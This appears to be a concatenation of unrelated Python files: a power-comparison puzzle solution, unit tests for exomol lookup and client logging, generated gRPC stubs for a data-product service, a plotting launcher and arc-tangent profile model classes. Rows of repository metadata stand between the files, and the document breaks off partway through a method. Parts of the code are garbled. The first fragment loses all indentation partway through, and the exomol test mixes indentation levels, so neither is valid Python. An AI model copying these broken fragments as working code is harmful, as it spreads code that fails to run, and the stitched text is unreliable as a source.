    # these two cases swapped, e.g. A=-1, B=-2, C=2 gives 1 < 4, i.e. '<'.)
    if C % 2 == 0:
        if A > B:
            print('<')
            exit()
        if A < B:
            print('>')
            exit()
    if A > B:
        print('>')
        exit()
    if A < B:
        print('<')
        exit()
if A < 0 < B:
if C % 2 == 0:
if abs(A) > B:
print('>')
exit()
if abs(A) < B:
print('<')
exit()
if C % 2 != 0:
print('<')
exit()
if B < 0 < A:
if C % 2 == 0:
if A > abs(B):
print('>')
exit()
if A < abs(B):
print('<')
exit()
if C % 2 != 0:
print('>')
exit()
if A == 0:
if B < 0:
if C % 2 == 0:
print('<')
exit()
if C % 2 != 0:
print('>')
exit()
if B > 0:
print('<')
exit()
if B == 0:
if A < 0:
if C % 2 == 0:
print('>')
exit()
if C % 2 != 0:
print('<')
exit()
if A > 0:
print('>')
exit()
print('=')
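
# Added editor sketch: the full case analysis above is equivalent to comparing a
# sign-aware key, since x**C is monotone in |x| for even C and in x for odd C
# (computing A**C directly is infeasible for C up to 1e9):
#
# def cmp_pow(a, b, c):
#     key = (lambda x: abs(x)) if c % 2 == 0 else (lambda x: x)
#     ka, kb = key(a), key(b)
#     return '=' if ka == kb else ('>' if ka > kb else '<')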
| 17.090909 | 51 | 0.285714 | 160 | 1,316 | 2.34375 | 0.125 | 0.432 | 0.498667 | 0.32 | 0.786667 | 0.773333 | 0.717333 | 0.56 | 0.56 | 0.56 | 0 | 0.058347 | 0.531155 | 1,316 | 76 | 52 | 17.315789 | 0.549433 | 0.037234 | 0 | 0.761194 | 0 | 0 | 0.01502 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.283582 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d92e1b1be8eacae36f325ea58cc1e96bd7cfd320 | 180 | py | Python | tests/utils/recexomol_test.py | dcmvdbekerom/exojax | 9b9305f8e383c73bdb97c1cfb0e276ddafcd75de | [
"MIT"
] | null | null | null | tests/utils/recexomol_test.py | dcmvdbekerom/exojax | 9b9305f8e383c73bdb97c1cfb0e276ddafcd75de | [
"MIT"
] | null | null | null | tests/utils/recexomol_test.py | dcmvdbekerom/exojax | 9b9305f8e383c73bdb97c1cfb0e276ddafcd75de | [
"MIT"
] | null | null | null | import pytest
from exojax.utils.recexomol import get_exomol_database_list
def test_get_recexomol():
    db, db0 = get_exomol_database_list("CO", "12C-16O")
assert db0=="Li2015"
| 25.714286 | 59 | 0.772222 | 27 | 180 | 4.851852 | 0.703704 | 0.137405 | 0.259542 | 0.320611 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063291 | 0.122222 | 180 | 6 | 60 | 30 | 0.765823 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | true | 0 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d9459a9da9e51691e160f9c0aac0d317a0858444 | 7,494 | py | Python | client/logging_test.py | lvzheqi/StreamingEventCompliance | 3a9470f9b0b670c814864369f22e1f1eacef7bad | [
"BSD-2-Clause"
] | 3 | 2018-10-16T15:14:41.000Z | 2019-09-04T09:38:55.000Z | client/logging_test.py | lvzheqi/StreamingEventCompliance | 3a9470f9b0b670c814864369f22e1f1eacef7bad | [
"BSD-2-Clause"
] | 2 | 2021-03-31T19:00:14.000Z | 2021-12-13T19:51:46.000Z | client/logging_test.py | lvzheqi/StreamingEventCompliance | 3a9470f9b0b670c814864369f22e1f1eacef7bad | [
"BSD-2-Clause"
] | 2 | 2018-10-16T15:14:43.000Z | 2019-12-16T13:58:28.000Z | import unittest
from simulate_stream_event.client_logging import ClientLogging
from simulate_stream_event.config import CLIENT_LOG_PATH
import sys
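
# Minimal helper sketch (added; assumes the log line layout the tests parse):
# reads the last line of the client log and strips the leading timestamp fields,
# keeping the "LEVEL user func ..." tail that every test below compares against.
def _last_log_line(path=CLIENT_LOG_PATH):
    with open(path, 'r') as f:
        lines = f.read().splitlines()
    return ' '.join(lines[-1].split(' ')[3:])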
class TestClientLogging(unittest.TestCase):
def test_log_info_2(self):
func_name = sys._getframe().f_code.co_name
test_data_in_log_file = ''
compare_test_data_in_log_file = "INFO Username:Unknown test_log_info_2 'Testing logging info with 2 arguments'"
ClientLogging().log_info(func_name, "Testing logging info with 2 arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
def test_log_info_3(self):
func_name = sys._getframe().f_code.co_name
uuid = 'test_user'
test_data_in_log_file = ''
compare_test_data_in_log_file = "INFO test_user test_log_info_3 'Testing logging info with 3 arguments'"
ClientLogging().log_info(func_name, uuid, "Testing logging info with 3 arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
def test_log_info_5(self):
func_name = sys._getframe().f_code.co_name
uuid = 'test_user'
dic = {
'case_id': 'test1',
'activity': 'testing_log_info_5',
}
test_data_in_log_file = ''
compare_test_data_in_log_file = "INFO test_user test_log_info_5 Case_id:test1 Activity:testing_log_info_5 " \
"'Testing logging info with 5 arguments'"
ClientLogging().log_info(func_name, uuid, dic['case_id'], dic['activity'], "Testing logging info with 5 "
"arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
def test_log_info_6(self):
func_name = sys._getframe().f_code.co_name
uuid = 'test_user'
dic = {
'case_id': 'test1',
'activity': 'testing_log_info_6',
}
thread_id = 1
test_data_in_log_file = ''
compare_test_data_in_log_file = "INFO test_user test_log_info_6 Thread:1 Case_id:test1 Activity:testing_" \
"log_info_6 " \
"'Testing logging info with 6 arguments'"
ClientLogging().log_info(func_name, uuid, thread_id, dic['case_id'], dic['activity'], "Testing logging info with 6 "
"arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
def test_log_error_2(self):
func_name = sys._getframe().f_code.co_name
test_data_in_log_file = ''
compare_test_data_in_log_file = "ERROR Username:Unknown test_log_error_2 'Testing logging error with 2 arguments'"
ClientLogging().log_error(func_name, "Testing logging error with 2 arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
def test_log_error_3(self):
func_name = sys._getframe().f_code.co_name
uuid = 'test_user'
test_data_in_log_file = ''
compare_test_data_in_log_file = "ERROR test_user test_log_error_3 'Testing logging error with 3 arguments'"
ClientLogging().log_error(func_name, uuid, "Testing logging error with 3 arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
def test_log_error_5(self):
func_name = sys._getframe().f_code.co_name
uuid = 'test_user'
dic = {
'case_id': 'test1',
'activity': 'testing_log_info_5',
}
test_data_in_log_file = ''
compare_test_data_in_log_file = "ERROR test_user test_log_error_5 Case_id:test1 Activity:testing_log_info_5 " \
"'Testing logging error with 5 arguments'"
ClientLogging().log_error(func_name, uuid, dic['case_id'], dic['activity'], "Testing logging error with 5 "
"arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
def test_log_error_6(self):
func_name = sys._getframe().f_code.co_name
uuid = 'test_user'
dic = {
'case_id': 'test1',
'activity': 'testing_log_info_6',
}
thread_id = 1
test_data_in_log_file = ''
compare_test_data_in_log_file = "ERROR test_user test_log_error_6 Thread:1 Case_id:test1 Activity:testing_" \
"log_info_6 " \
"'Testing logging error with 6 arguments'"
ClientLogging().log_error(func_name, uuid, thread_id, dic['case_id'], dic['activity'],
"Testing logging error with 6 "
"arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
if __name__ == '__main__':
unittest.main()
| 49.629139 | 124 | 0.616894 | 1,012 | 7,494 | 4.083004 | 0.060277 | 0.1394 | 0.17425 | 0.226525 | 0.937803 | 0.937803 | 0.869797 | 0.821152 | 0.821152 | 0.816796 | 0 | 0.012794 | 0.290766 | 7,494 | 150 | 125 | 49.96 | 0.764628 | 0 | 0 | 0.710145 | 0 | 0 | 0.182813 | 0.007206 | 0 | 0 | 0 | 0 | 0.057971 | 1 | 0.057971 | false | 0 | 0.028986 | 0 | 0.094203 | 0.115942 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d965e6ac9d1098adcd6e34c3a7fa9b0826426cdf | 12,265 | py | Python | lang/python/github/com/metaprov/modelaapi/services/dataproduct/v1/dataproduct_pb2_grpc.py | metaprov/modeldapi | ee05693832051dcd990ee4f061715d7ae0787340 | [
"Apache-2.0"
] | 5 | 2022-02-18T03:40:10.000Z | 2022-03-01T16:11:24.000Z | lang/python/github/com/metaprov/modelaapi/services/dataproduct/v1/dataproduct_pb2_grpc.py | metaprov/modeldapi | ee05693832051dcd990ee4f061715d7ae0787340 | [
"Apache-2.0"
] | 1 | 2022-01-07T19:59:25.000Z | 2022-02-04T01:21:14.000Z | lang/python/github/com/metaprov/modelaapi/services/dataproduct/v1/dataproduct_pb2_grpc.py | metaprov/modeldapi | ee05693832051dcd990ee4f061715d7ae0787340 | [
"Apache-2.0"
] | 1 | 2022-03-25T10:21:43.000Z | 2022-03-25T10:21:43.000Z | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from github.com.metaprov.modelaapi.services.dataproduct.v1 import dataproduct_pb2 as github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2
class DataProductServiceStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ListDataProducts = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/ListDataProducts',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.ListDataProductsRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.ListDataProductsResponse.FromString,
)
self.CreateDataProduct = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/CreateDataProduct',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.CreateDataProductRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.CreateDataProductResponse.FromString,
)
self.GetDataProduct = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/GetDataProduct',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.GetDataProductRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.GetDataProductResponse.FromString,
)
self.UpdateDataProduct = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/UpdateDataProduct',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.UpdateDataProductRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.UpdateDataProductResponse.FromString,
)
self.DeleteDataProduct = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/DeleteDataProduct',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.DeleteDataProductRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.DeleteDataProductResponse.FromString,
)
class DataProductServiceServicer(object):
"""Missing associated documentation comment in .proto file."""
def ListDataProducts(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateDataProduct(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetDataProduct(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateDataProduct(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteDataProduct(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_DataProductServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'ListDataProducts': grpc.unary_unary_rpc_method_handler(
servicer.ListDataProducts,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.ListDataProductsRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.ListDataProductsResponse.SerializeToString,
),
'CreateDataProduct': grpc.unary_unary_rpc_method_handler(
servicer.CreateDataProduct,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.CreateDataProductRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.CreateDataProductResponse.SerializeToString,
),
'GetDataProduct': grpc.unary_unary_rpc_method_handler(
servicer.GetDataProduct,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.GetDataProductRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.GetDataProductResponse.SerializeToString,
),
'UpdateDataProduct': grpc.unary_unary_rpc_method_handler(
servicer.UpdateDataProduct,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.UpdateDataProductRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.UpdateDataProductResponse.SerializeToString,
),
'DeleteDataProduct': grpc.unary_unary_rpc_method_handler(
servicer.DeleteDataProduct,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.DeleteDataProductRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.DeleteDataProductResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
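# Server-side wiring sketch (the port and the servicer name below are
# hypothetical; a concrete servicer must override the unimplemented
# methods above):
#   from concurrent import futures
#   server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
#   add_DataProductServiceServicer_to_server(MyDataProductServicer(), server)
#   server.add_insecure_port('[::]:3000')
#   server.start()
#   server.wait_for_termination()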
# This class is part of an EXPERIMENTAL API.
class DataProductService(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def ListDataProducts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/ListDataProducts',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.ListDataProductsRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.ListDataProductsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateDataProduct(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/CreateDataProduct',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.CreateDataProductRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.CreateDataProductResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetDataProduct(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/GetDataProduct',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.GetDataProductRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.GetDataProductResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateDataProduct(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/UpdateDataProduct',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.UpdateDataProductRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.UpdateDataProductResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteDataProduct(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/DeleteDataProduct',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.DeleteDataProductRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.DeleteDataProductResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
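# Client-side sketch (the address is a hypothetical example;
# DataProductServiceStub is defined earlier in this module and the request
# class comes from the generated pb2 module used throughout this file):
#   with grpc.insecure_channel('localhost:3000') as channel:
#       stub = DataProductServiceStub(channel)
#       reply = stub.ListDataProducts(
#           github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.ListDataProductsRequest())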
| 61.633166 | 183 | 0.754015 | 1,233 | 12,265 | 7.000811 | 0.089213 | 0.100556 | 0.043095 | 0.053869 | 0.882762 | 0.882762 | 0.882762 | 0.855306 | 0.84152 | 0.809546 | 0 | 0.007525 | 0.187362 | 12,265 | 198 | 184 | 61.944444 | 0.858533 | 0.055932 | 0 | 0.493827 | 1 | 0 | 0.11172 | 0.084681 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.012346 | 0.030864 | 0.135802 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d992b71eb981482a81f42333231912a3a812f479 | 496 | py | Python | python/analyzer.py | MPinna/epidemic_broadcast | c8c2cbe9c6398c7ed3a68749892b438bceca629a | [
"MIT"
] | null | null | null | python/analyzer.py | MPinna/epidemic_broadcast | c8c2cbe9c6398c7ed3a68749892b438bceca629a | [
"MIT"
] | null | null | null | python/analyzer.py | MPinna/epidemic_broadcast | c8c2cbe9c6398c7ed3a68749892b438bceca629a | [
"MIT"
] | null | null | null | import subprocess
# print all pki plots; each plots.py call below runs in its own subprocess (parallel run)
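# A blocking variant (a sketch, assuming the same plots.py command-line
# interface) would collect the Popen handles and wait on each:
#   procs = [subprocess.Popen(["python", "plots.py", metric, stat, "0.95"])
#            for metric in ('duration (s)', 'collisions', 'coverage (%)')
#            for stat in ('median', 'mean')]
#   for p in procs:
#       p.wait()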
subprocess.Popen(["python", "plots.py", 'duration (s)' ,"median" ,"0.95"])
subprocess.Popen(["python", "plots.py", 'duration (s)' ,"mean" ,"0.95"])
subprocess.Popen(["python", "plots.py", 'collisions' ,"median" ,"0.95"])
subprocess.Popen(["python", "plots.py", 'collisions' ,"mean" ,"0.95"])
subprocess.Popen(["python", "plots.py", 'coverage (%)' ,"median" ,"0.95"])
subprocess.Popen(["python", "plots.py", 'coverage (%)' ,"mean" ,"0.95"]) | 55.111111 | 74 | 0.637097 | 64 | 496 | 4.9375 | 0.296875 | 0.28481 | 0.398734 | 0.493671 | 0.832278 | 0.832278 | 0.832278 | 0.686709 | 0 | 0 | 0 | 0.039648 | 0.084677 | 496 | 9 | 75 | 55.111111 | 0.656388 | 0.072581 | 0 | 0 | 0 | 0 | 0.447826 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7951a3a63ef8b1e1c3cab3782b242a9784ccd584 | 5,632 | py | Python | src/modelSuite/atanProfile.py | mirofedurco/PyAstronomy | b0e5806a18bde647654e6c9de323327803722864 | [
"MIT"
] | 98 | 2015-01-01T12:46:05.000Z | 2022-02-13T14:17:36.000Z | src/modelSuite/atanProfile.py | mirofedurco/PyAstronomy | b0e5806a18bde647654e6c9de323327803722864 | [
"MIT"
] | 46 | 2015-02-10T19:53:38.000Z | 2022-01-11T17:26:05.000Z | src/modelSuite/atanProfile.py | mirofedurco/PyAstronomy | b0e5806a18bde647654e6c9de323327803722864 | [
"MIT"
] | 38 | 2015-01-08T17:00:34.000Z | 2022-03-04T05:15:22.000Z | from __future__ import print_function, division
from PyAstronomy import funcFit as fuf
import numpy as np
class AtanProfile(fuf.OneDFit):
"""
A profile based on the arc tangent function.
This class implements the following profile:
.. math::
f(x) = \\frac{A}{2\\arctan(\\sigma)} \\times \\left(\\arctan\\left(\\frac{x-\mu}{scale} + \sigma\\right) +
\\arctan\\left(-\\frac{x-\mu}{scale} + \sigma\\right)\\right) +
\mu \\times x + off
which can provide a relatively flat top and steep edges.
*Fit parameters*
- `A` - The amplitude: in this case, the height of the profile (not the
area under it) reached at :math:`x=0`. Note that for
:math:`\mu \\not = 0` the highest point may be elsewhere,
which is neglected here.
- `scale` - A scale parameter affecting the width of the profile. Note,
however, that also :math:`\sigma` affects the width.
- `mu` - The center of the profile.
- `off` - An offset
- `lin` - A gradient in the offset.
The width of the profile may be approximated by the inflection points, which
are given by
.. math::
\\frac{\\partial^2 f(x)}{\partial x^2} = 0 \\rightarrow
x_{1,2} = \mu \\pm\\frac{scale}{3}\\left(-3+3\sigma^2+6\\sqrt{\sigma^4+\sigma^2+1}\\right)^{1/2}
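Example
-------
A minimal usage sketch; the parameter values below are illustrative only:

>>> ap = AtanProfile()
>>> for name, val in zip(["A", "scale", "sig", "mu", "off", "lin"],
...                      [1.0, 1.0, 5.0, 0.0, 0.0, 0.0]):
...     ap[name] = val
>>> y = ap.evaluate(np.linspace(-10., 10., 201))
>>> x1, x2 = ap.inflectionPoints()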
"""
def __init__(self):
fuf.OneDFit.__init__(self, ["scale", "sig", "mu", "A", "off", "lin"])
def evaluate(self, x):
"""
Calculates and returns model according to the
current parameter values.
Parameters
----------
x : Array
The positions at which to evaluate the model.
"""
# Shift by mu
x = x - self["mu"]
# The heart of the profile
y = np.arctan(x/self["scale"] + self["sig"]) + np.arctan(-x/self["scale"] + self["sig"])
# Make the highest point (actually most extreme point)
# equal to A
y *= (self["A"] / (2.*np.arctan(self["sig"])))
# Add offset and gradient
y += self["off"]
y += self["lin"] * (x + self["mu"])
return y
def inflectionPoints(self):
"""
Calculate the inflection points.
The inflection points of the profile depend on
both :math:`\sigma` and :math:`\mu`.
Returns
-------
Inflection points : tuple
Locations of the inflection points. Smaller one first.
"""
d = abs(self["scale"])/3.0 * \
np.sqrt(-3. + 3.*self["sig"]**2 + 6.*np.sqrt(self["sig"]**4 + self["sig"]**2 + 1.0))
return self["mu"]-d, self["mu"]+d
class AtanProfileDamped(fuf.OneDFit):
"""
A profile based on the arc tangent function.
This class implements the following profile:
.. math::
d(x) = f(x) \\times H(|x-\mu| - |ifp-\mu|) \\times
\\exp\\left(\\frac{|x-\mu| - |ifp-\mu|}{\\tau}\\right) +
\mu \\times x + off
Here :math:`f(x)` is the profile described in :py:class:`AtanProfile`,
H denotes the Heaviside function, and ifp is the location of the
inflection point. The parameter :math:`\\tau` can be used to provide
an additional drop at the edges of the profile.
*Fit parameters*
- `A` - The amplitude: in this case, the height of the profile (not the
area under it) reached at :math:`x=0`. Note that for
:math:`\mu \\not = 0` the highest point may be elsewhere,
which is neglected here.
- `scale` - A scale parameter affecting the width of the profile. Note,
however, that also :math:`\sigma` affects the width.
- `tau` - This parameter controls an additional drop at the edges
of the profile.
- `mu` - The center of the profile.
- `off` - An offset
- `lin` - A gradient in the offset.
The width of the profile may be approximated by the inflection points, which
are given by
.. math::
\\frac{\\partial^2 f(x)}{\partial x^2} = 0 \\rightarrow
x_{1,2} = \mu \\pm\\frac{scale}{3}\\left(-3+3\sigma^2+6\\sqrt{\sigma^4+\sigma^2+1}\\right)^{1/2}
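Example
-------
A minimal usage sketch with illustrative values; `tau` adds the extra
drop beyond the inflection points:

>>> apd = AtanProfileDamped()
>>> for name, val in zip(["A", "scale", "sig", "mu", "off", "lin", "tau"],
...                      [1.0, 1.0, 5.0, 0.0, 0.0, 0.0, 2.0]):
...     apd[name] = val
>>> y = apd.evaluate(np.linspace(-10., 10., 201))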
"""
def __init__(self):
fuf.OneDFit.__init__(self, ["scale", "sig", "mu", "A", "off", "lin", "tau"])
def evaluate(self, x):
"""
Calculates and returns model according to the
current parameter values.
Parameters
----------
x : Array
The positions at which to evaluate the model.
"""
# Shift by mu
